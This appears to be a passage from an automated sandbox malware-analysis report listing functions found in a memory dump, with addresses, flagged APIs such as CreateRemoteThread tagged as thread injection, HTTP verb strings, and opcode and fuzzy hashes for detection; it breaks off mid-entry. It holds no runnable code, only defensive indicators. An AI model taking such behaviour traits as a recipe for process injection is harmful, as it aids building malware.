                                        Uniqueness Score: -1.00%

                                        Function 004AB778 Relevance: 1.6, APIs: 1, Instructions: 142threadinjectionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateRemoteThread.KERNELBASE ref: 004AB804
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CreateRemoteThread
                                        • String ID:
                                        • API String ID: 4286614544-0
                                        • Opcode ID: 8392c1dc0a52588864f677939bcae8883cd2c5c5d72091cbfa0b224961d9c261
                                        • Instruction ID: 14e54dca859995285cdabb2bb984aff1ff79d146035957ac50974da394a12159
                                        • Opcode Fuzzy Hash: 8392c1dc0a52588864f677939bcae8883cd2c5c5d72091cbfa0b224961d9c261
                                        • Instruction Fuzzy Hash: 9941A17061CB098FDB54EF2CD84876677E0FBBA305F10452EE449C3261DB78D8458B86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00492424 Relevance: 1.6, APIs: 1, Instructions: 105COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 3039107ca0c9a0dd08c39ff6bf1c338f01f06550e5e36451c98288ebb66ad9be
                                        • Instruction ID: fa1286de7cbc905e9f937cc2a99210a89f1f87189cf5073027c186323f518dec
                                        • Opcode Fuzzy Hash: 3039107ca0c9a0dd08c39ff6bf1c338f01f06550e5e36451c98288ebb66ad9be
                                        • Instruction Fuzzy Hash: C331AF303086049BEB69EF39EDD196A77E2EB98304315543EA447C3261DF7CD9078B49
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004AAE0C Relevance: 1.6, APIs: 1, Instructions: 74memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 37412ea2b15601eb3ebfa3a796bfc612b2833c41f46d6d55742f6e21b8bc049b
                                        • Instruction ID: 27d4ac1b6ebaddddbf26cf2cdb35cdbe313ef4d2f850c6f56fbe7ef2fbef7316
                                        • Opcode Fuzzy Hash: 37412ea2b15601eb3ebfa3a796bfc612b2833c41f46d6d55742f6e21b8bc049b
                                        • Instruction Fuzzy Hash: 5511813124CB084F9B15EF58E445026B7E9EB99301B00053EE88BC3345EA74ED058B87
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00495700 Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE ref: 004957AC
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: ChangeCloseFindNotification
                                        • String ID:
                                        • API String ID: 2591292051-0
                                        • Opcode ID: e301ad82b46d5bc6c4c1c064812861293b47abd0149e53f152c4bb114163d11c
                                        • Instruction ID: 2293f901a5a57af976f8438564f3edc4c9cb806e44aa750b0524963e82e1edff
                                        • Opcode Fuzzy Hash: e301ad82b46d5bc6c4c1c064812861293b47abd0149e53f152c4bb114163d11c
                                        • Instruction Fuzzy Hash: CC217230208F098FEB65EF6CD894A6777E1FB98311F50456EA50AC3261DF78D9418B41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 004A1E44 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: GET $GET $OPTI$OPTI$POST$PUT
                                        • API String ID: 0-647159250
                                        • Opcode ID: 50c845f161074de749cb8e198b8368c44465edf6f144e8fc7a854a08973e98a0
                                        • Instruction ID: 5123ecccd72433d93c81c56fe2044132118d27a9e1160d49171e79681caaf1c4
                                        • Opcode Fuzzy Hash: 50c845f161074de749cb8e198b8368c44465edf6f144e8fc7a854a08973e98a0
                                        • Instruction Fuzzy Hash: AC22DA30218B098FD769EF2CD8896A673E1FBA5301F14452ED88BC3255DF78E946CB45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00482178 Relevance: 3.3, Strings: 2, Instructions: 797COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: O*<m$yPjD
                                        • API String ID: 0-4099160962
                                        • Opcode ID: 2b8fd3942ef950e1221e992bd55514e2908320d1e1a8f6c3c47bf47efa5a8ac6
                                        • Instruction ID: c81392980bf6c85be6bdfc378bd48b7686c5b2bb79c41bbbd9eeb3c8ace81f31
                                        • Opcode Fuzzy Hash: 2b8fd3942ef950e1221e992bd55514e2908320d1e1a8f6c3c47bf47efa5a8ac6
                                        • Instruction Fuzzy Hash: 2932B331218A098BDB39BF6989A827F72D1FB94304F540D2FD84BC2251DFBCD946974A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004846B0 Relevance: 2.9, Strings: 2, Instructions: 442COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: HTTP$POST
                                        • API String ID: 0-4028717631
                                        • Opcode ID: 9bf207ec8b592152fb790e858d1ab336a5add37733928cedceac216da2f8d8cb
                                        • Instruction ID: c0310d94901e093eae54c8d9668bf9f21c536cd12be673e6f9e4e387d113cc9c
                                        • Opcode Fuzzy Hash: 9bf207ec8b592152fb790e858d1ab336a5add37733928cedceac216da2f8d8cb
                                        • Instruction Fuzzy Hash: 46E1A570318B199FD769EF28D4C4AAAB3E4FB98704B10492EE48AC7655CF34F845CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00481E64 Relevance: 2.7, Strings: 2, Instructions: 234COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: L$L
                                        • API String ID: 0-138625451
                                        • Opcode ID: a840391b2219f66e2d66586c5dadbab221495647dac0f6cd716c453d7a079a68
                                        • Instruction ID: 74f3734106757af813511ffda1f86b5d8a824501209bb8839dd4728cd292ea02
                                        • Opcode Fuzzy Hash: a840391b2219f66e2d66586c5dadbab221495647dac0f6cd716c453d7a079a68
                                        • Instruction Fuzzy Hash: 61619230718A088FEB68FB39988966F77D5FB99340F50482FE54AC3255DE78D842CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049DA04 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: K$P
                                        • API String ID: 0-420285281
                                        • Opcode ID: 024fed10e5d9d09b268311843609ae501bec72334cda09e2a9d0ff75911a65e5
                                        • Instruction ID: 323083d46511116187371ca5788f52c424d9aa9ae30e96d151f16cd595b62ca4
                                        • Opcode Fuzzy Hash: 024fed10e5d9d09b268311843609ae501bec72334cda09e2a9d0ff75911a65e5
                                        • Instruction Fuzzy Hash: 9D41A13050CB888FCB59DF6C848465BBFE0FFA9304F150AAEE489D7342D668D949C796
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A9010 Relevance: 2.2, Strings: 1, Instructions: 999COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: W
                                        • API String ID: 0-655174618
                                        • Opcode ID: dcb82e8256e2ce061bbe1cebd59b3d1097c52dad9155290d0d8187a2f299a22b
                                        • Instruction ID: 4471b874ce4f1c34e8a5310df511a5d9db1edc51156466293afb1fa611556963
                                        • Opcode Fuzzy Hash: dcb82e8256e2ce061bbe1cebd59b3d1097c52dad9155290d0d8187a2f299a22b
                                        • Instruction Fuzzy Hash: A552A571718A0C8FDB54EF68D8C996A73E1F7A9700F04462ED58BC3251EE38ED468786
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00498F68 Relevance: 1.7, Strings: 1, Instructions: 489COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: bc53f77ba08c014bed967a31de99a8108d1c5401526011305a171fadafe16daf
                                        • Instruction ID: bca17c3a941014c2d1ec014072c5ce1c15763243b5a2b5b6ee0699e092860afa
                                        • Opcode Fuzzy Hash: bc53f77ba08c014bed967a31de99a8108d1c5401526011305a171fadafe16daf
                                        • Instruction Fuzzy Hash: 03E17530618B098FDB69EF5DD885AA677E1FB98300F44463EE44AC3291EF34ED458B85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048C340 Relevance: 1.6, Strings: 1, Instructions: 381COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: P
                                        • API String ID: 0-3110715001
                                        • Opcode ID: c24b1997b2e0d4e13dca4d96d640a2a20b0061d34189475c49de7a914ce37a03
                                        • Instruction ID: 867277ad556984466183cfde3a6399ce9713c989d0e56ff2984025400fd09963
                                        • Opcode Fuzzy Hash: c24b1997b2e0d4e13dca4d96d640a2a20b0061d34189475c49de7a914ce37a03
                                        • Instruction Fuzzy Hash: 06C1943061CA084FD769FF2CD8C56AD73E5F799300F64452ED44AC3266EF3899428B96
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00494A1C Relevance: 1.6, Strings: 1, Instructions: 346COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: vids
                                        • API String ID: 0-3767230166
                                        • Opcode ID: a0c3ba0cfa101a8ec92e9164b019af6ed199202d39997f22df79995224430ee3
                                        • Instruction ID: 443f54a966541dd8eb2d81c5ad6f5624c3e2c84efc9fbf0219311ba17c018334
                                        • Opcode Fuzzy Hash: a0c3ba0cfa101a8ec92e9164b019af6ed199202d39997f22df79995224430ee3
                                        • Instruction Fuzzy Hash: 0EC1807561C7448FDB28EF29C455BAAB7E1FBC5315F104A2EE58AC3251DB38D802CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00499E18 Relevance: 1.6, Strings: 1, Instructions: 315COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 1e5b7e5f04a2bb6c276e42055b0e9eaa995bcb8a599f236d279b74b5cbd3a434
                                        • Instruction ID: 78a0b4f1b4480f9401dcf5335f6c37a05ed4517c1e9e08d162a499d554527ec8
                                        • Opcode Fuzzy Hash: 1e5b7e5f04a2bb6c276e42055b0e9eaa995bcb8a599f236d279b74b5cbd3a434
                                        • Instruction Fuzzy Hash: B5A166317189088FEB58EF28DC896A977E5F798700B14842EE44BC3265DF38DD46CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00497484 Relevance: 1.0, Instructions: 982COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bffc89de96a83bc20005c3ecb6c9d29644430e4201cdba91dd1242f4369d19ce
                                        • Instruction ID: 4d0f38b64b5be50c9e9156b40f364c034b55e651b05625ba475c9a0464c636a9
                                        • Opcode Fuzzy Hash: bffc89de96a83bc20005c3ecb6c9d29644430e4201cdba91dd1242f4369d19ce
                                        • Instruction Fuzzy Hash: 97426B767B82804B974CC918DCA36F932DAE7C630E71CA43DE9C7C6247EA29D5078948
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048D2F4 Relevance: .8, Instructions: 836COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7e863a817ce8f8d66e153c53dc5ac4e3e78db416119b8b9008f6e28a992329ee
                                        • Instruction ID: c30edb294e942cccbf95b894f006bb3739c0124d3ccf39e835249b8dee43b98d
                                        • Opcode Fuzzy Hash: 7e863a817ce8f8d66e153c53dc5ac4e3e78db416119b8b9008f6e28a992329ee
                                        • Instruction Fuzzy Hash: 8152E3309256448FCB6DDF18C4C56B937E0FB49314B2455BEDC8BCB29BD6389886CB89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049AEF8 Relevance: .6, Instructions: 634COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 58f6a492fede72eb43244b104c64920e288341dba265c3ac7427c44115f90083
                                        • Instruction ID: b171c77c5b89c0e7cd556ad6b30033013f2ded26a6273b0a6d692c574094d193
                                        • Opcode Fuzzy Hash: 58f6a492fede72eb43244b104c64920e288341dba265c3ac7427c44115f90083
                                        • Instruction Fuzzy Hash: E112E370618B599FC71DDE2899852F9B790FB46318F14027FC9D783602DB29A427CBCA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049887C Relevance: .6, Instructions: 579COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7d0cac939c4d67ed9d40f60512abb4f805e6b3b48ebefa45f8bc3c36e16af780
                                        • Instruction ID: dd63e3aa5321de2e94096f8dc7525bec1871196e5134b53d50691b29c74fe97c
                                        • Opcode Fuzzy Hash: 7d0cac939c4d67ed9d40f60512abb4f805e6b3b48ebefa45f8bc3c36e16af780
                                        • Instruction Fuzzy Hash: 29024030754A0A8BFB54FB2E9895ABA77D6FB98304B44843F944AC3351DF38E8058B56
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048B14C Relevance: .6, Instructions: 575COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f36c4d60181d640de5e235b9064a8967bb23e4c1bd9d7e1182dc78ea9f97f2f3
                                        • Instruction ID: d2dfff017f87ee3ed3153c1a5d20fb49c648202285a3bcc93ac617deac1be70d
                                        • Opcode Fuzzy Hash: f36c4d60181d640de5e235b9064a8967bb23e4c1bd9d7e1182dc78ea9f97f2f3
                                        • Instruction Fuzzy Hash: 4AF13270628A194FC72DAE2CD8861BEB2D1F785709F64063FD587C3256EA28D84787C9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00492EC4 Relevance: .6, Instructions: 572COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ac8f036472d19e0b55038eb8e1a65459873f483f363ab4134c4a0563a92367e8
                                        • Instruction ID: db01f8f9481400c006f32075c43edfd16b7badbc6329ba0f092dbac7f19fda4b
                                        • Opcode Fuzzy Hash: ac8f036472d19e0b55038eb8e1a65459873f483f363ab4134c4a0563a92367e8
                                        • Instruction Fuzzy Hash: 24128A30614F9AAFCB0DDF38C1815A4BBA1FB5631A710426AC466C3A51D739F966CFC8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049FBE8 Relevance: .5, Instructions: 533COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b95c414c1fa686c78839f1d639cae7cc38e8ddef1a470c610e31cf3b9f34d164
                                        • Instruction ID: 8fd4948c23409f37cabe2a6653884a8499ad70587e551493348ca05e56156cda
                                        • Opcode Fuzzy Hash: b95c414c1fa686c78839f1d639cae7cc38e8ddef1a470c610e31cf3b9f34d164
                                        • Instruction Fuzzy Hash: 00F1A631618A484FCB68EF2894857AAB7D1FB99300F60463FD88FC3255DE34D84687CA
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00488BB0 Relevance: .5, Instructions: 490COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 713d9eaeeb4c6f76b538fa03a312c68ee02a4f32256c34645a27027a1850be51
                                        • Instruction ID: 67a542cbe53be9a72709744ac1ea2b8600d9e34a3297886cd23c6f304a5126f8
                                        • Opcode Fuzzy Hash: 713d9eaeeb4c6f76b538fa03a312c68ee02a4f32256c34645a27027a1850be51
                                        • Instruction Fuzzy Hash: F5D15C30258E484FEB1DAE18D8C22B977D2F756701F94556EC6C7C3352DE29E4838B8A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049996C Relevance: .4, Instructions: 449COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: a7e924741babb4dc263e0ebd9c787cb3709332fc9d997b3727db7dc206383d41
                                        • Instruction ID: 771cfaed805e08d1e3a310c5827dc06aea61575f97ab71b32037904fae165647
                                        • Opcode Fuzzy Hash: a7e924741babb4dc263e0ebd9c787cb3709332fc9d997b3727db7dc206383d41
                                        • Instruction Fuzzy Hash: 99D19630218A488FDB58EF6CD885A6AB7E1FB95301F14456EE49BC3261DF34EC45CB46
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049F26C Relevance: .4, Instructions: 447COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3f581514f6409fd78aef992c20b54b195c7f1967c77fc7198bb91bafdabee3d2
                                        • Instruction ID: 8c8f0b56fa05b5254ff0aeba8dc6405bfef6952a7f5582d6c4da80d68a2daf41
                                        • Opcode Fuzzy Hash: 3f581514f6409fd78aef992c20b54b195c7f1967c77fc7198bb91bafdabee3d2
                                        • Instruction Fuzzy Hash: FDE14230618B488FDB64EF29DC896AB77E1FB98315F04493ED44AC3261DB78D949CB42
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A45A0 Relevance: .4, Instructions: 424COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 643d067df1aee9e2a925ffb6c3ad42431e6068fe0351d3510bc2272ade53da15
                                        • Instruction ID: e2f02e54fcd1a38dc431a4a53b605740eb693a4f4d5518be9c7edd1df89a7173
                                        • Opcode Fuzzy Hash: 643d067df1aee9e2a925ffb6c3ad42431e6068fe0351d3510bc2272ade53da15
                                        • Instruction Fuzzy Hash: F4C1D43171C9884FDB09EB2D98995F67BE5EBAB30070841A9D5CAC7263DE28D843C785
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A7498 Relevance: .4, Instructions: 397COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1a28715f4eec02fdc61474002f89d6b6d313b833d3c6510810c54d185ee06829
                                        • Instruction ID: b143c8851604f8489d9f52172188e2425bcc71f1970c2ff4d02a1b6d8b8d8f0c
                                        • Opcode Fuzzy Hash: 1a28715f4eec02fdc61474002f89d6b6d313b833d3c6510810c54d185ee06829
                                        • Instruction Fuzzy Hash: 27C1D93160CA0C8FDB68FF18DC8956973E5F7A8304B044A2ED44AD7255EF39EA45CB85
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0048E2D4 Relevance: .4, Instructions: 385COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 57b2e706abbe3a4618e153f457fba3aacd2e076069da8509358674049509f659
                                        • Instruction ID: e35d5a5004f1b4008cf032dd756f42cfefc3775e0e8ea4e35370862e9a49f5be
                                        • Opcode Fuzzy Hash: 57b2e706abbe3a4618e153f457fba3aacd2e076069da8509358674049509f659
                                        • Instruction Fuzzy Hash: 47C17230218B05CFD768EF2AC85966BB7E5FB94715F504D2EE48BC3690EB38E8418B45
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004A6D20 Relevance: .4, Instructions: 383COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: d7fcb819bd38cf3529a07ca0de42efd087d7bbbd4fbd75a87e626aab0d21359c
                                        • Instruction ID: 5d101f0de16c18462b81ed9d12e11ec9a3a803d40bf49f84460b79d7108f6dbb
                                        • Opcode Fuzzy Hash: d7fcb819bd38cf3529a07ca0de42efd087d7bbbd4fbd75a87e626aab0d21359c
                                        • Instruction Fuzzy Hash: E5C13031718A488FDBA4EF38D88866A77E2FB9D301F55492EE44EC3251DB38E945CB41
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00495108 Relevance: .4, Instructions: 375COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID: CloseCreateQueryValue
                                        • String ID:
                                        • API String ID: 4083198587-0
                                        • Opcode ID: dc092088bee61bfc4b448b9d13d4a956910e0a2a3e9d702be249882191bd98a4
                                        • Instruction ID: 5407ee5bed41c08605b3ea29bd08858733a906f326e20f0c105b6f419982bc42
                                        • Opcode Fuzzy Hash: dc092088bee61bfc4b448b9d13d4a956910e0a2a3e9d702be249882191bd98a4
                                        • Instruction Fuzzy Hash: F0B18730718B044FDB79EF2CD88566A77D2F7D8310F24852ED48BC3255DE38A9468B86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0049594C Relevance: .3, Instructions: 336COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1c7ba3f8aacb86ddc751bb446758702a0f00477686c4e1115c30a36250432e6
                                        • Instruction ID: 88c2b0ddef2b88242de0fffabe4a75c6a5158f4af014af869f1268e7604550b6
                                        • Opcode Fuzzy Hash: c1c7ba3f8aacb86ddc751bb446758702a0f00477686c4e1115c30a36250432e6
                                        • Instruction Fuzzy Hash: 08A19430618F498FDB55DF18D885766BBE1FB98311F64853EE88AC3250DB34E842CB86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004929EC Relevance: .3, Instructions: 335COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.722923108.0000000000481000.00000020.80000000.00040000.00000000.sdmp, Offset: 00481000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_481000_control.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 7aaa2366a48a4e7610556f41d4445af28f879c6bc129f0b88c4ee7ecb4045e06
                                        • Instruction ID: fea7bb020ac71e0db3f5226413369169271d9213a39f49f5f6ffd55ac69e49a1
                                        • Opcode Fuzzy Hash: 7aaa2366a48a4e7610556f41d4445af28f879c6bc129f0b88c4ee7ecb4045e06
